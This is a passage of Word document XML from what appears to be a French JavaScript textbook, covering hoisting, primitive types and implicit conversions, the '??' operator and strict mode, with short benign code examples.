            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Mécanisme qui remonte les déclarations en tête de leur portée. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>var</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> est hissé et vaut </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>undefined</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> avant son affectation ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>let</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sont dans une zone morte temporelle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Règle pratique : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par défaut, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> seulement si la valeur doit changer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> jamais dans du code neuf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>24.5 Types et conversions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JavaScript possède sept types primitifs et un type objet. La conversion implicite est la première source de bogues subtils.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.78 — Sept types primitifs et leurs pièges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180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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"texte"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>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Concaténation avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>NaN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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0.1 + 0.2 !== 0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bigint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>42n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>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Pas de mélange avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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true</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Valeurs « fausses » nombreuses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>typeof null === "object"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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undefined</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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undefined</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Différent de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>symbol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Symbol()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clés uniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Les conversions qui surprennent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"5" + 3        // "53"   (concaténation)</w:t>
        <w:br/>
        <w:t>"5" - 3        // 2      (soustraction numérique)</w:t>
        <w:br/>
        <w:t>Number("5")    // 5</w:t>
        <w:br/>
        <w:t>parseInt("42px", 10)  // 42</w:t>
        <w:br/>
        <w:t>Number("42px") // NaN</w:t>
        <w:br/>
        <w:br/>
        <w:t>Boolean("")    // false</w:t>
        <w:br/>
        <w:t>Boolean("0")   // true  (chaîne non vide)</w:t>
        <w:br/>
        <w:t>Boolean(0)     // false</w:t>
        <w:br/>
        <w:br/>
        <w:t>0.1 + 0.2 === 0.3              // false</w:t>
        <w:br/>
        <w:t>Math.abs(0.1 + 0.2 - 0.3) &lt; 1e-9  // true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plutôt que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : l'égalité stricte évite les conversions implicites. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>null == undefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le seul cas où </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reste parfois toléré, et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>??</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> couvre désormais ce besoin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`??` ne se déclenche que pour `null` et `undefined`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const valeur = null;</w:t>
        <w:br/>
        <w:t>const resultat = valeur ?? "défaut";   // "défaut" (null et undefined)</w:t>
        <w:br/>
        <w:t>const autre = 0 || "défaut";           // "défaut" (0 est falsy) — piège</w:t>
        <w:br/>
        <w:t>const juste = 0 ?? "défaut";           // 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>24.6 Mode strict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> active un mode d'exécution plus rigoureux : variables non déclarées interdites, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non défini, affectations silencieuses transformées en erreurs. Les modules sont stricts par défaut.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une erreur détectée tôt plutôt qu'un bogue tardif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"use strict";</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Sans strict : crée une variable globale par accident</w:t>
        <w:br/>
        <w:t>// avec strict : ReferenceError</w:t>
        <w:br/>
        <w:t>fonctionInconnue = 10;</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TROIS RÉFLEXES DE DÉPART</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const</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> par défaut, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>let</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> si nécessaire.</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> plutôt que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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 fichier par responsabilité, chargé en module.</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JavaScript s'exécute dans le navigateur, Node.js ou un service worker.</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defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et les modules évitent de bloquer l'analyse du document.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module possède sa propre portée et s'organise en import/export.</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const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche la réaffectation, pas la modification d'un objet.</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let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ont une portée de bloc ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non.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conversions implicites produisent des bogues difficiles à voir.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>??</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplacent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans la plupart des cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
